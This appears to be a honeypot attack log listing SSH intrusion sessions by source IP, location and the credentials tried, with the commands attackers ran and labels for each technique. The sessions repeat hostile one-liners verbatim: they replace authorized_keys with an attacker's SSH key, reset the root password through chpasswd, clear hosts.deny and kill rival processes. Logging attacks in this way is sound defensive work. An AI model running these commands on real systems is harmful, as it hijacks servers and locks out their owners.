$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:0rHUuoerFCLB"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 borscht_root_5 (45.132.19.23) β€” Moscow, Russia Β· 1 session Β· 19 cmds
2026-05-22 01:42 EDT Β· as root/Qt123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:XgK1s4VpHWwG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_84 (187.191.48.22) β€” Tijuana, Mexico Β· 2 sessions Β· 2 cmds
2026-05-21 11:19 EDT Β· as root/blackcat, root/swissmp2021.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 wraith_root_72 (78.83.249.54) β€” Burgas, Bulgaria Β· 1 session Β· 19 cmds
2026-05-22 00:54 EDT Β· as root/qwer1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:avbjbdZjPp4u"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_72 (57.128.239.139) β€” Warsaw, Poland Β· 2 sessions Β· 21 cmds
2026-05-15 02:18 EDT Β· as gerente/gerente, root/root123root
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:V5NHyta2iP1B"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_17 (14.103.111.16) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-22 00:35 EDT Β· as root/8i9o0p-[
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:65jXesTjrKUP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tiger_root_13 (34.0.13.61) β€” New Delhi, India Β· 2 sessions Β· 39 cmds
2026-05-20 07:00 EDT Β· as minecraft/1234, root/1Qaz2wsx
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:zaVH8E5mRdpx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "1234\nl4k1WRXLJuCF\nl4k1WRXLJuCF"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nl4k1WRXLJuCF\nl4k1WRXLJuCF\n"|passwd
🎭 burger_root_43 (45.61.187.220) β€” Miami, United States Β· 1 session Β· 19 cmds
2026-05-22 00:30 EDT Β· as root/root123root
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:9wkUGGNouCj3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_11 (182.253.31.67) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-05-22 00:11 EDT Β· as test/123123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123123\nqQyUJbGmxCjr\nqQyUJbGmxCjr"|passwd|bash
$ Enter new UNIX password:
$ echo "123123\nqQyUJbGmxCjr\nqQyUJbGmxCjr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tsar_root_9 (86.102.131.54) β€” Ussuriysk, Russia Β· 1 session Β· 19 cmds
2026-05-22 00:08 EDT Β· as root/1Qaz2wsx
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:9srx2ZmQ3nze"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 viking (45.8.93.197) β€” Stockholm, Sweden Β· 1 session Β· 20 cmds
2026-05-21 23:46 EDT Β· as lek/lek
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "lek\nl8prDrA0XqDO\nl8prDrA0XqDO"|passwd|bash
$ Enter new UNIX password:
$ echo "lek\nl8prDrA0XqDO\nl8prDrA0XqDO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 samba_root_6 (45.164.251.106) β€” GoiΓ’nia, Brazil Β· 1 session Β· 1 cmd
2026-05-21 23:43 EDT Β· as root/Swissmp@2021!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 chai_root_19 (103.188.48.226) β€” Khandwa, India Β· 1 session Β· 1 cmd
2026-05-21 23:07 EDT Β· as root/swissmp2020.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_91 (41.63.62.103) β€” Lusaka, Zambia Β· 1 session Β· 19 cmds
2026-05-21 23:03 EDT Β· as root/A100s200
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:4zHv74rQGa2l"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chateau_root_10 (81.17.100.9) β€” Lauterbourg, France Β· 1 session Β· 19 cmds
2026-05-21 22:53 EDT Β· as root/Ws123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:uTHZtzdJOSjc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_25 (113.57.5.139) β€” Wuhan, China Β· 1 session Β· 1 cmd
2026-05-21 22:46 EDT Β· as root/swissmp2025!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_3 (125.31.0.18) β€” Zhuojiacun, Macao Β· 1 session Β· 1 cmd
2026-05-21 22:30 EDT Β· as root/P@ssw0rd123
decode obfuscated payload
$ echo 'dGVzdA==' | base64 -d 2>/dev/null // decode obfuscated payload
🎭 crepe_root_13 (173.212.212.105) β€” Lauterbourg, France Β· 2 sessions Β· 39 cmds
2026-05-21 21:35 EDT Β· as mailuser/1234, root/Root123#
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1234\ni3kYExcFOuDg\ni3kYExcFOuDg"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\ni3kYExcFOuDg\ni3kYExcFOuDg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:cQJeODzCdqmU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 yankee_root_35 (172.200.228.35) β€” Boydton, United States Β· 3 sessions Β· 58 cmds
2026-05-21 21:09 EDT Β· as mailuser/1234, root/Root123#, root/admin#1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:UBuDMjtgMdZK"|chpasswd|bash
